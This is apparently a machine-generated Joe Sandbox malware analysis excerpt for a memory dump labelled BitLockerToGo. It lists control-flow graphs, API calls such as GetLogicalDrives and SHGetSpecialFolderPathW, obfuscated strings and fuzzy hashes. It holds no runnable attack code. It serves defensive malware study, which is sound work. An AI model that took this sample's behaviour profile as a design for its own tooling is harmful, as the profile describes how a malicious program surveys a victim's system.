323->295 323->296 323->297 323->298 323->299 323->300 323->301 323->302 323->303 323->304 323->305 323->306 323->307 323->308 326->291 326->298 326->299 326->300 326->301 326->303 326->305 326->307 328->322 331->292 337->275 337->276 337->277 337->279 337->281 337->282 337->290 337->291 337->292 337->293 337->294 337->295 337->296 337->297 337->298 337->299 337->300 337->301 337->302 337->303 337->304 337->305 337->306 337->307 337->308
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: FuD$:8$'J*H$7V>T$I.Q,$^*^($cfgd$fRnP$n^d\$oZdX$uBc@
                                                                                                                                                                                                            • API String ID: 0-4178537825
                                                                                                                                                                                                            • Opcode ID: 0ab402fb4809c95dc4027289a1b8894fb3f44387b0cf046cf4c9e6df90fd333a
                                                                                                                                                                                                            • Instruction ID: bcbedf8eb0a07792cc22a0f8fb5d0594b8c224fc694cc013ea00b116edda161a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ab402fb4809c95dc4027289a1b8894fb3f44387b0cf046cf4c9e6df90fd333a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0002AAB5200B00CFD3248F69D891797BBF5FB45314F058A2DE5AA8BBA0C7B8A415CF95
                                                                                                                                                                                                            Function 004229CD Relevance: 11.5, APIs: 3, Strings: 3, Instructions: 1008COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 344 4229cd-4229d9 345 4229e0-4229fd 344->345 346 422a10-422a1f 344->346 347 422ad0 344->347 348 422a40-422a4e 344->348 349 422ad6-422ae6 344->349 350 422a26-422a39 344->350 351 422a6f-422a7f 344->351 345->346 345->347 345->348 345->349 345->350 345->351 346->346 346->347 346->348 346->350 346->351 348->346 348->351 357 422a60-422a68 348->357 352 422b40 349->352 353 422e31-422e63 call 40a600 349->353 354 422e6a-422e7d 349->354 355 422b58-422b74 349->355 356 422aed-422b2c call 43f450 * 2 349->356 350->346 350->347 350->348 350->351 351->347 351->349 351->352 351->353 351->355 351->356 351->357 358 422aa0-422aab 351->358 359 422ac0 351->359 360 422a86-422a99 351->360 361 422aae-422ab4 351->361 390 422b48-422b51 352->390 353->354 363 422eb2-422eb7 353->363 364 422e90-422eab 353->364 365 422ee5-422ef7 353->365 366 422ebe-422ede 353->366 394 422f00-422f12 353->394 354->363 354->364 354->365 354->366 367 422be2-422bea 355->367 368 422bc0 355->368 369 422b80-422b8a 355->369 370 422c60-422c68 355->370 371 422dc0-422dd2 355->371 372 422c24-422c57 355->372 373 422d89-422d95 355->373 374 422bd0-422bd8 355->374 375 422c10-422c1d 355->375 376 422c70-422c79 355->376 377 422b91-422bb9 355->377 378 422bf7-422c07 355->378 379 422dd9-422de8 355->379 380 422d9c-422db0 355->380 356->352 356->353 356->354 356->363 356->364 356->365 356->366 356->394 357->346 357->351 358->361 359->347 360->347 360->349 360->352 360->353 360->354 360->355 360->356 360->357 360->358 360->359 360->361 361->359 363->364 363->366 364->363 364->365 364->366 365->352 365->390 393 422e22-422e2a 365->393 365->394 366->363 366->364 366->365 367->378 368->374 369->367 369->368 369->369 369->370 369->371 369->372 369->373 369->374 369->375 369->376 369->377 369->378 369->379 369->380 392 422c7d-422c8a 370->392 371->379 383 423022-42302c 371->383 384 423020 371->384 385 423120-423187 371->385 386 423001-423013 371->386 387 422def-422df6 371->387 388 423016-42301f 371->388 389 422dff-422e09 371->389 372->370 373->367 373->368 373->369 373->370 373->371 373->372 373->374 373->375 373->376 373->378 373->379 373->380 373->383 373->384 373->385 373->386 373->387 373->388 373->389 374->367 375->369 375->370 375->371 375->372 375->376 375->379 376->392 377->367 377->368 377->369 377->370 377->371 377->372 377->374 377->375 377->376 377->378 377->379 378->369 378->370 378->371 378->372 378->375 378->376 378->379 379->383 379->384 379->385 379->386 379->387 379->388 379->389 380->371 380->379 380->383 380->384 380->385 380->386 380->387 380->388 380->389 397 423190-4231be 385->397 386->388 387->389 388->384 389->388 390->352 390->355 390->365 390->390 390->393 399 422c90-422cfe 392->399 393->352 393->353 393->354 393->363 393->364 393->365 393->366 393->394 401 422f20-422f8a 394->401 397->397 405 4231c0-423208 RtlExpandEnvironmentStrings 397->405 399->399 407 422d00-422d10 399->407 401->401 408 422f8c-422f97 401->408 409 423210-42325f 405->409 407->369 410 422d16-422d25 407->410 411 422e10-422e1b 408->411 412 422f9d-422fa9 408->412 409->409 414 423261-42326e 409->414 415 422d30-422d37 410->415 411->352 411->390 411->393 413 422fb0-422fb7 412->413 416 422fc3-422fc9 413->416 417 422fb9-422fbc 413->417 418 4232d2-4232db 414->418 419 4235e1-42366e 414->419 420 4235c6 414->420 421 4235b6-4235be 414->421 422 4232b4 414->422 423 423275-4232ad call 407ed0 RtlExpandEnvironmentStrings 414->423 424 4232c5-4232ca 414->424 425 423448-4234f4 call 407ed0 414->425 426 42342f-423441 414->426 427 4232dc-42332b call 407ed0 414->427 428 4232bc-4232c2 call 407ee0 414->428 429 422d43-422d49 415->429 430 422d39-422d3c 415->430 416->411 433 422fcf-422ff6 call 43d910 416->433 417->413 432 422fbe 417->432 434 423670-423684 419->434 421->420 422->428 423->419 423->420 423->421 423->422 423->424 423->425 423->426 423->427 423->428 437 4232d0 424->437 472 423500-423536 425->472 426->418 426->419 426->420 426->421 426->424 426->425 426->428 435 4236a4-4236bb 426->435 436 4235cc-4235d2 call 407ee0 426->436 426->437 438 4237b4 426->438 439 4237ba-4237c2 call 407ee0 426->439 440 4235db 426->440 470 423330-4233ad 427->470 428->424 429->369 445 422d4f-422d82 call 43d910 429->445 430->415 444 422d3e 430->444 432->411 433->386 434->434 449 423686-423694 call 421060 434->449 450 4236c0-4236fc 435->450 436->440 444->369 445->367 445->368 445->369 445->370 445->371 445->372 445->373 445->374 445->375 445->376 445->377 445->378 445->379 445->380 445->383 445->384 445->385 445->386 445->387 445->388 445->389 466 423699-42369c 449->466 450->450 461 4236fe-423771 450->461 467 423780-423790 461->467 466->435 467->467 471 423792-4237ab call 420c30 467->471 470->470 473 4233af-4233bd 470->473 471->438 472->472 475 423538-423543 472->475 476 4233e1-4233f0 473->476 477 4233bf-4233c4 473->477 479 423561-42356f 475->479 480 423545-42354f 475->480 482 4233f2-4233f5 476->482 483 423411-42341b call 440ba0 476->483 481 4233d0-4233df 477->481 485 423591-4235af GetLogicalDrives call 440ba0 479->485 486 423571-423574 479->486 484 423550-42355f 480->484 481->476 481->481 487 423400-42340f 482->487 491 423420-423428 483->491 484->479 484->484 485->418 485->420 485->421 485->424 485->428 485->435 485->436 485->437 485->438 485->439 485->440 489 423580-42358f 486->489 487->483 487->487 489->485 489->489 491->418 491->419 491->420 491->421 491->424 491->425 491->426 491->428 491->435 491->436 491->437 491->438 491->439 491->440
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: "0B$7x~$`*B
                                                                                                                                                                                                            • API String ID: 0-767839351
                                                                                                                                                                                                            • Opcode ID: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
                                                                                                                                                                                                            • Instruction ID: 9fd70d4789ae2a743fdbd81f1d1a9eea778115e9b5f68926e692af45083946f2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4726576A08211CFD714CF68EC817AAB7B2FF89314F09897CE945AB391D7389901CB95
                                                                                                                                                                                                            Function 004095A0 Relevance: 9.1, Strings: 7, Instructions: 320COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 493 4095a0-4095ae 494 4095b4-40961f call 405da0 call 407ed0 493->494 495 409985 493->495 501 409620-409645 494->501 497 409987-409993 495->497 501->501 502 409647-409663 call 408ef0 501->502 505 409670-409684 502->505 505->505 506 409686-4096a3 call 408ef0 505->506 509 4096b0-4096c4 506->509 509->509 510 4096c6-4096ef call 408ef0 509->510 513 4096f0-40971d 510->513 513->513 514 40971f-409729 513->514 515 409730-409771 514->515 515->515 516 409773-40978e call 408ef0 515->516 519 409790-4097a4 516->519 519->519 520 4097a6-40986e call 409140 519->520 523 409870-409895 520->523 523->523 524 409897-40989f 523->524 525 4098c1-4098cc 524->525 526 4098a1-4098a9 524->526 528 4098f1-40991f 525->528 529 4098ce-4098d1 525->529 527 4098b0-4098bf 526->527 527->525 527->527 531 409920-409946 528->531 530 4098e0-4098ef 529->530 530->528 530->530 531->531 532 409948-40995d call 40bf40 531->532 534 409962-409983 call 407ee0 532->534 534->497
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 8A6CA42990BFD5D420A4C476FD51BCB1$96$ec$fg$m$t{$T
                                                                                                                                                                                                            • API String ID: 0-115365862
                                                                                                                                                                                                            • Opcode ID: 4f28de017bae56af272f2ebb78918ce2254d3fc1898780eaaedbce328d025c84
                                                                                                                                                                                                            • Instruction ID: 04ace9e08cfa33f9ed2207d002dc48eeb8774e5e1fc40806eeb0b6624e25d2eb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f28de017bae56af272f2ebb78918ce2254d3fc1898780eaaedbce328d025c84
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41A1E5B01083808BD714DF65C895AABBBE5EBC2318F14896DE0D1DB392D739C909CB56
                                                                                                                                                                                                            Function 00408640 Relevance: 7.7, APIs: 5, Instructions: 220threadCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 537 408640-408651 call 43d0a0 540 4088e6-4088e8 ExitProcess 537->540 541 408657-40865e call 4354a0 537->541 544 4088e1 call 43d860 541->544 545 408664-40868a GetCurrentProcessId GetCurrentThreadId 541->545 544->540 546 408690-40876a SHGetSpecialFolderPathW 545->546 547 40868c-40868e 545->547 549 408770-40878c 546->549 547->546 549->549 550 40878e-4087bf call 43bc90 549->550 553 4087c0-4087dc 550->553 554 4087f6-40880b GetForegroundWindow 553->554 555 4087de-4087f4 553->555 556 408811-408832 554->556 557 4088ab-4088c3 call 4099e0 554->557 555->553 559 408834-408836 556->559 560 408838-4088a9 556->560 562 4088c5 call 40c660 557->562 563 4088cf-4088d6 557->563 559->560 560->557 566 4088ca call 40b4c0 562->566 563->544 565 4088d8-4088de call 407ee0 563->565 565->544 566->563
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00408664
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0040866E
                                                                                                                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040874C
                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00408803
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 004088E8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4063528623-0
                                                                                                                                                                                                            • Opcode ID: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
                                                                                                                                                                                                            • Instruction ID: cffc6beeb204386c5c3c11e80dbd3dd055112d37bec62ae1e5896589e5666a59
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F613977B447084BD718AFA9CD8635AB6D29B84710F0E813DA594DB3D2ED7CDC009789
                                                                                                                                                                                                            Function 0042BE8A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 644 42be8a-42bea6 645 42beb0-42bf05 644->645 645->645 646 42bf07-42bf0e 645->646 647 42c284 646->647 648 42bf14-42bf1b 646->648 650 42c287-42c2a5 647->650 649 42bf20-42bf29 648->649 649->649 651 42bf2b 649->651 653 42c2b0-42c2dd 650->653 651->650 653->653 654 42c2df-42c2e6 653->654 655 42c2fb-42c307 654->655 656 42c2e8-42c2ef 654->656 658 42c321-42c348 call 43f450 655->658 659 42c309-42c30b 655->659 657 42c2f0-42c2f9 656->657 657->655 657->657 663 42c34d-42c38f GetPhysicallyInstalledSystemMemory 658->663 660 42c310-42c31d 659->660 660->660 662 42c31f 660->662 662->658 664 42c390-42c3e9 663->664 664->664 665 42c3eb-42c429 call 41dc90 664->665 668 42c430-42c471 665->668 668->668 669 42c473-42c47a 668->669 670 42c47c-42c483 669->670 671 42c49d 669->671 673 42c490-42c499 670->673 672 42c4a0-42c4aa 671->672 675 42c4ac-42c4af 672->675 676 42c4bd 672->676 673->673 674 42c49b 673->674 674->672 678 42c4b0-42c4b9 675->678 677 42c4bf-42c4ce 676->677 680 42c4d0-42c4d7 677->680 681 42c4eb-42c53a 677->681 678->678 679 42c4bb 678->679 679->677 682 42c4e0-42c4e9 680->682 683 42c540-42c55e 681->683 682->681 682->682 683->683 684 42c560-42c567 683->684 685 42c57b-42c588 684->685 686 42c569-42c56f 684->686 688 42c58a-42c591 685->688 689 42c5ab-42c661 685->689 687 42c570-42c579 686->687 687->685 687->687 690 42c5a0-42c5a9 688->690 691 42c662 689->691 690->689 690->690 691->691
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                            • String ID: BVAI
                                                                                                                                                                                                            • API String ID: 3960555810-2651495128
                                                                                                                                                                                                            • Opcode ID: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
                                                                                                                                                                                                            • Instruction ID: ce2e31214bed253c0b38068d6f273c2badb2212a27c3daf9020c2c42f253850c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66C1373160C3908BC725CF2994903AFBFE1AF9A304F5849AED4C9D7352D7798806CB5A
                                                                                                                                                                                                            Function 0042C26C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 337COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 696 42c26c-42c2a5 call 4327d0 call 407ee0 702 42c2b0-42c2dd 696->702 702->702 703 42c2df-42c2e6 702->703 704 42c2fb-42c307 703->704 705 42c2e8-42c2ef 703->705 707 42c321-42c348 call 43f450 704->707 708 42c309-42c30b 704->708 706 42c2f0-42c2f9 705->706 706->704 706->706 712 42c34d-42c38f GetPhysicallyInstalledSystemMemory 707->712 709 42c310-42c31d 708->709 709->709 711 42c31f 709->711 711->707 713 42c390-42c3e9 712->713 713->713 714 42c3eb-42c429 call 41dc90 713->714 717 42c430-42c471 714->717 717->717 718 42c473-42c47a 717->718 719 42c47c-42c483 718->719 720 42c49d 718->720 722 42c490-42c499 719->722 721 42c4a0-42c4aa 720->721 724 42c4ac-42c4af 721->724 725 42c4bd 721->725 722->722 723 42c49b 722->723 723->721 727 42c4b0-42c4b9 724->727 726 42c4bf-42c4ce 725->726 729 42c4d0-42c4d7 726->729 730 42c4eb-42c53a 726->730 727->727 728 42c4bb 727->728 728->726 731 42c4e0-42c4e9 729->731 732 42c540-42c55e 730->732 731->730 731->731 732->732 733 42c560-42c567 732->733 734 42c57b-42c588 733->734 735 42c569-42c56f 733->735 737 42c58a-42c591 734->737 738 42c5ab-42c661 734->738 736 42c570-42c579 735->736 736->734 736->736 739 42c5a0-42c5a9 737->739 740 42c662 738->740 739->738 739->739 740->740
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                            • String ID: BVAI
                                                                                                                                                                                                            • API String ID: 3960555810-2651495128
                                                                                                                                                                                                            • Opcode ID: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
                                                                                                                                                                                                            • Instruction ID: 4ac38620278a99acf54b81f63bd20ff9ec3c0600e4476075f1787c1a2961d72f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FA1397160C3908BC725CF2994903EFBBE1AF9B304F58496ED4C997342D7798906CB5A
                                                                                                                                                                                                            Function 0042C282 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 741 42c282-42c2a5 743 42c2b0-42c2dd 741->743 743->743 744 42c2df-42c2e6 743->744 745 42c2fb-42c307 744->745 746 42c2e8-42c2ef 744->746 748 42c321-42c38f call 43f450 GetPhysicallyInstalledSystemMemory 745->748 749 42c309-42c30b 745->749 747 42c2f0-42c2f9 746->747 747->745 747->747 754 42c390-42c3e9 748->754 750 42c310-42c31d 749->750 750->750 752 42c31f 750->752 752->748 754->754 755 42c3eb-42c429 call 41dc90 754->755 758 42c430-42c471 755->758 758->758 759 42c473-42c47a 758->759 760 42c47c-42c483 759->760 761 42c49d 759->761 763 42c490-42c499 760->763 762 42c4a0-42c4aa 761->762 765 42c4ac-42c4af 762->765 766 42c4bd 762->766 763->763 764 42c49b 763->764 764->762 768 42c4b0-42c4b9 765->768 767 42c4bf-42c4ce 766->767 770 42c4d0-42c4d7 767->770 771 42c4eb-42c53a 767->771 768->768 769 42c4bb 768->769 769->767 772 42c4e0-42c4e9 770->772 773 42c540-42c55e 771->773 772->771 772->772 773->773 774 42c560-42c567 773->774 775 42c57b-42c588 774->775 776 42c569-42c56f 774->776 778 42c58a-42c591 775->778 779 42c5ab-42c661 775->779 777 42c570-42c579 776->777 777->775 777->777 780 42c5a0-42c5a9 778->780 781 42c662 779->781 780->779 780->780 781->781
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                            • String ID: BVAI
                                                                                                                                                                                                            • API String ID: 3960555810-2651495128
                                                                                                                                                                                                            • Opcode ID: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
                                                                                                                                                                                                            • Instruction ID: b3ae04337b81b82226eeb8f92f7c3334391f9750b5f809a1d1c02d35e42eb35b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6A1377160C3908BC7258F2994903EFBFE1AF9A304F58496ED4C997352D7798806CB5A
                                                                                                                                                                                                            Function 00440480 Relevance: 2.8, Strings: 2, Instructions: 345COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID: =:;8$
                                                                                                                                                                                                            • API String ID: 2994545307-3594289699
                                                                                                                                                                                                            • Opcode ID: 9971fbae55c470a46498d2abe49c779c55fc4cb17bce0a149da73fd2c7f0910c
                                                                                                                                                                                                            • Instruction ID: c423fdc3fd0ad810bcad91faa20af3043e37e718d9259fa2435a4e627f55f2db
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9971fbae55c470a46498d2abe49c779c55fc4cb17bce0a149da73fd2c7f0910c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFA1657AB083104BE724DF64D88066BB7E2EBD5314F19853DDAC297341DA38EC25CB96
                                                                                                                                                                                                            Function 00426000 Relevance: 2.8, Strings: 2, Instructions: 286COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID: Zysf${ts|
                                                                                                                                                                                                            • API String ID: 2994545307-929106683
                                                                                                                                                                                                            • Opcode ID: 330ee75e3bd9f455a8908d9dc58e8014dd1dde360c5c7ac0f7533fcfcbbb6c79
                                                                                                                                                                                                            • Instruction ID: d8bc85cb00ae77c9a618740bd9c139a142b3571fb9705fb1d300c60273d40d62
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 330ee75e3bd9f455a8908d9dc58e8014dd1dde360c5c7ac0f7533fcfcbbb6c79
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F817EB1B083219BD714DF25EC81B3B73A6DBC5314F59843EE58697392E63CAC04839A
                                                                                                                                                                                                            Function 0040D6F8 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 8A6CA42990BFD5D420A4C476FD51BCB1$]b
                                                                                                                                                                                                            • API String ID: 0-633589551
                                                                                                                                                                                                            • Opcode ID: 416f5a0ace6e6ba72c734dbe947573464599ab33d1e233289b3341e2fccb922a
                                                                                                                                                                                                            • Instruction ID: 53dbd2ff0650d5a4b6327cdb9e65b9ca1bffd35d2773582bc8f85aad4ecb8dd8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 416f5a0ace6e6ba72c734dbe947573464599ab33d1e233289b3341e2fccb922a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1617977E043904BD320CB26CC517AFBAD2ABD5315F19C93DD8C9E7285DB3849058782
                                                                                                                                                                                                            Function 0040C22D Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: uJ[L$yJ[L
                                                                                                                                                                                                            • API String ID: 0-3296124075
                                                                                                                                                                                                            • Opcode ID: 0a5ccc53d7ad34005281885bb5bdc5f0493f34b58fb1c7104cb2bead719577d2
                                                                                                                                                                                                            • Instruction ID: 974635f0455fef9b14944d53f12c23bc89291c5e3f93e9d67168785d5e3144d2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a5ccc53d7ad34005281885bb5bdc5f0493f34b58fb1c7104cb2bead719577d2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC31E5B2A405019FDB19CF68CC627AE7BE2EB59310F29417DD252E7790DB3999018718
                                                                                                                                                                                                            Function 0043D910 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                            Function 0043BCE0 Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID: yPC
                                                                                                                                                                                                            • API String ID: 2994545307-621879255
